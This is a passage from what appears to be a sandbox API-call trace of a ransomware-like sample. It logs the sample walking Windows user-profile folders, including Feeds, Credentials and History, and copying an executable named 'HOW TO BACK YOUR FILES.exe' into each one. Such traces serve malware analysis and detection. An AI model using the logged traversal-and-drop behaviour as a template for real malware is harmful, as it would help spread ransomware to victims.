lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.054] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\feeds cache\\d68g7bij\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.054] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.055] GetLastError () returned 0x0 [0066.055] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.055] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x58777480, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x58777480, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.055] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0066.055] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0066.055] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7" [0066.055] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7" [0066.055] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.055] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\feeds cache\\6asvn7j7\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.056] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.056] GetLastError () returned 0x0 [0066.056] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.056] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x587c3740, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x587c3740, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.056] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0066.056] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0066.056] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR" [0066.056] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR" [0066.056] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.057] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\feeds cache\\1nbur4hr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.057] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.057] GetLastError () returned 0x0 [0066.057] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.057] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5880fa00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5880fa00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.058] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0066.058] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0066.058] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds" [0066.058] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds" [0066.058] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.058] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\feeds\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.058] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.059] GetLastError () returned 0x0 [0066.059] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.059] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5880fa00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5880fa00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.059] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0066.059] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0066.059] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" [0066.059] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" [0066.059] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.059] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.060] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.060] GetLastError () returned 0x0 [0066.060] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.060] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac52b20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac52b20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.060] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0066.060] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0066.061] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" [0066.061] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" [0066.061] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.061] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.061] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.061] GetLastError () returned 0x0 [0066.062] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.062] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x58881e20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x58881e20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.062] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0066.062] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0066.062] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~" [0066.062] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~" [0066.062] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.062] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\feeds\\microsoft feeds~\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.063] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.063] GetLastError () returned 0x0 [0066.063] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.063] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x58940500, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x58940500, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.063] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0066.063] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0066.063] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials" [0066.063] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials" [0066.063] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.063] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\credentials\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.064] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.064] GetLastError () returned 0x0 [0066.064] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.064] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac9ede0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac9ede0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.064] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0066.064] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0066.064] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History" [0066.065] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History" [0066.065] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.065] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\history\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.065] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.065] GetLastError () returned 0x0 [0066.065] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.065] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x58966660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x58966660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.066] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0066.066] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0066.066] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\Low", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\Low") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\Low" [0066.066] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\Low" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\Low") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\Low" [0066.066] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" 